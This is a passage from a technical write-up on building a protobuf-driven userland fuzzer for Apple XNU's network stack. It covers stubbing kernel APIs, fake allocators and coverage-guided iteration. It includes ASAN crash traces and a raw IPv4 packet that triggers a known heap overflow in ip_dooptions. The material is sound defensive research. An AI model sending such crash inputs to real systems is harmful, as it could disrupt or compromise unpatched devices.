    SetSocketOpt set_sock_opt = 2;

    Socket socket = 3;

    Close close = 4;

  }

}

message Session {

  repeated Command commands = 1;

  required bytes data_provider = 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {

// ...

  std::set<int> open_fds;

  for (const Command &command : session.commands()) {

    int retval = 0;

    switch (command.command_case()) {

      case Command::kSocket: {

        int fd = 0;

        int err = socket_wrapper(command.socket().domain(),

                                 command.socket().so_type(),

                                 command.socket().protocol(), &fd);

        if (err == 0) {

          // Make sure we're tracking fds properly.

          if (open_fds.find(fd) != open_fds.end()) {

            printf("Found existing fd %d\n", fd);

            assert(false);

          }

          open_fds.insert(fd);

        }

        break;

      }

      case Command::kClose: {

        open_fds.erase(command.close().fd());

        close_wrapper(command.close().fd(), nullptr);

        break;

      }

      case Command::kSetSockOpt: {

        int s = command.set_sock_opt().fd();

        int level = command.set_sock_opt().level();

        int name = command.set_sock_opt().name();

        size_t size = command.set_sock_opt().val().size();

        std::unique_ptr<char[]> val(new char[size]);

        memcpy(val.get(), command.set_sock_opt().val().data(), size);

        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);

        break;

      }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message Packet {

  oneof packet {

    TcpPacket tcp_packet = 1;

  }

}

message TcpPacket {

  required IpHdr ip_hdr = 1;

  required TcpHdr tcp_hdr = 2;

  optional bytes data = 3;

}

message IpHdr {

  required uint32 ip_hl = 1;

  required IpVersion ip_v = 2;

  required uint32 ip_tos = 3;

  required uint32 ip_len = 4;

  required uint32 ip_id = 5;

  required uint32 ip_off = 6;

  required uint32 ip_ttl = 7;

  required Protocol ip_p = 8;

  required InAddr ip_src = 9;

  required InAddr ip_dst = 10;

}

message TcpHdr {

  required Port th_sport = 1;

  required Port th_dport = 2;

  required TcpSeq th_seq = 3;

  required TcpSeq th_ack = 4;

  required uint32 th_off = 5;

  repeated TcpFlag th_flags = 6;

  required uint32 th_win = 7;

  required uint32 th_sum = 8;

  required uint32 th_urp = 9;

  // Ned's extensions

  required bool is_pure_syn = 10;

  required bool is_pure_ack = 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {

  struct tcphdr tcphdr = {

      .th_sport = (unsigned short)hdr.th_sport(),

      .th_dport = (unsigned short)hdr.th_dport(),

      .th_seq = __builtin_bswap32(hdr.th_seq()),

      .th_ack = __builtin_bswap32(hdr.th_ack()),

      .th_off = hdr.th_off(),

      .th_flags = 0,

      .th_win = (unsigned short)hdr.th_win(),

      .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it

      .th_urp = (unsigned short)hdr.th_urp(),

  };

  for (const int flag : hdr.th_flags()) {

    tcphdr.th_flags ^= flag;

  }

  // Prefer pure syn

  if (hdr.is_pure_syn()) {

    tcphdr.th_flags &= ~(TH_RST | TH_ACK);

    tcphdr.th_flags |= TH_SYN;

  } else if (hdr.is_pure_ack()) {

    tcphdr.th_flags &= ~(TH_RST | TH_SYN);

    tcphdr.th_flags |= TH_ACK;

  }

  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));

  return dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the “High-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

static int

pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)

{

        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

        nbigpipe = 0;

        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);

        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {

  mcache_init();

  mbinit();

  eventhandler_init();

  pipeinit();

  dlil_init();

  socketinit();

  domaininit();

  loopattach();

  ether_family_init();

  tcp_cc_init();

  net_init_run();

  int res = necp_init();

  assert(!res);

  return true;

}


The original
bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {

  uintptr_t size;

};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,

                   const char* name) {

  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));

  zone->size = size;

  return zone;

}

void* zalloc(struct zone* zone) {

  assert(zone != NULL);

  return calloc(1, zone->size);

}

void zfree(void* zone, void* dat) {

  (void)zone;

  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code.

struct m_hdr {

        struct mbuf     *mh_next;       /* next buffer in chain */

        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */

        caddr_t         mh_data;        /* location of data */

        int32_t         mh_len;         /* amount of data in this mbuf */

        u_int16_t       mh_type;        /* type of data in this mbuf */

        u_int16_t       mh_flags;       /* flags; see below */

};

/*

 * The mbuf object

 */

struct mbuf {

        struct m_hdr m_hdr;

        union {

                struct {

                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */

                        union {

                                struct m_ext MH_ext;    /* M_EXT set */

                                char    MH_databuf[_MHLEN];

                        } MH_dat;

                } MH;

                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */

        } M_dat;

};


I didn’t include the
pkthdr nor m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification.

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8

READ of size 1 at 0x61500026afe5 thread T0

    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)

freed by thread T0 here:

    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like
GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory-mapped in userspace, it goes through intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

int __attribute__((warn_unused_result))

copyin(void* user_addr, void* kernel_addr, size_t nbytes) {

  // Address 1 means use fuzzed bytes, otherwise use real bytes.

  // NOTE: this does not support nested useraddr.

  if (user_addr != (void*)1) {

    memcpy(kernel_addr, user_addr, nbytes);

    return 0;

  }

  if (get_fuzzed_bool()) {

    return -1;

  }

  get_fuzzed_bytes(kernel_addr, nbytes);

  return 0;

}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.

Randomness

Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field.

Authentication

XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol provided their KAuth credentials:

static int

socket_common(struct proc *p,

    int domain,

    int type,

    int protocol,

    pid_t epid,

    int32_t *retval,

    int delegate)

{

        struct socket *so;

        struct fileproc *fp;

        int fd, error;

        AUDIT_ARG(socket, domain, type, protocol);

#if CONFIG_MACF_SOCKET_SUBSET

        if ((error = mac_socket_check_create(kauth_cred_get(), domain,

            type, protocol)) != 0) {

                return error;

        }

#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash as this functionality was  stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3

    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39

    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void* kauth_cred_get() {

  return (void*)1;

}

Now we crash actually checking the KAuth permissions.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33

    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15

    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line despite producing several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer-authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing process control block (PCB) for that connection, as seen below.

void

tcp_input(struct mbuf *m, int off0)

{

// ...

        if (isipv6) {

            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,

                &ip6->ip6_dst, th->th_dport, 1,

                m->m_pkthdr.rcvif);

        } else

#endif /* INET6 */

        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,

            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*

 * Lookup PCB in hash list.

 */

struct inpcb *

in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,

    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,

    struct ifnet *ifp)

{

// ...

    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,

        pcbinfo->ipi_hashmask)];

    LIST_FOREACH(inp, head, inp_hash) {

-               if (inp->inp_faddr.s_addr == faddr.s_addr &&

-                   inp->inp_laddr.s_addr == laddr.s_addr &&

-                   inp->inp_fport == fport &&

-                   inp->inp_lport == lport) {

+               if (!get_fuzzed_bool()) {

                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=

                            WNT_STOPUSING) {

                                lck_rw_done(pcbinfo->ipi_lock);

                                return inp;


Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h

index a5ec42ab..37f6ee50 100644

--- a/bsd/netinet/in_pcb.h

+++ b/bsd/netinet/in_pcb.h

@@ -611,10 +611,9 @@ struct inpcbinfo {

        u_int32_t               ipi_flags;

 };

-#define INP_PCBHASH(faddr, lport, fport, mask) \

-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))

-#define INP_PCBPORTHASH(lport, mask) \

-       (ntohs((lport)) & (mask))

+// nedwill: let all pcbs share the same hash

+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)

+#define        INP_PCBPORTHASH(lport, mask) (0)

 #define INP_IS_FLOW_CONTROLLED(_inp_) \

        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58

WRITE of size 20 at 0x61d00029f474 thread T0

    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3

    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3

    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2

    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45

    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12

    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6

    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7

    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {

  ip_input {

    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

  }

}

data_provider: ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in
mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed.

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0

    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36

    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3

    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3

    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16

    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3

    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10

    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8

    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15

    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10

    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10

    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9

    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11

    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9

